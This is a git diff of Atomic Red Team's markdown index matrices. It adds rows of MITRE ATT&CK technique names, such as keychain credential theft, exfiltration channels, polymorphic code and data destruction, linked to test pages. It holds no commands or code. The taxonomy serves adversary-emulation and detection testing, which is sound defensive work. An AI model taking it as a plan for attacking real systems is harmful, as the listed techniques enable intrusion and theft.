+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) |  | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) |  | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+|  | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
+|  |  | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+|  |  | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
+|  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -65,6 +66,7 @@
 |  |  |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -76,7 +78,9 @@
 |  |  |  |  | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 237801e633..aa329754c8 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -5,114 +5,116 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
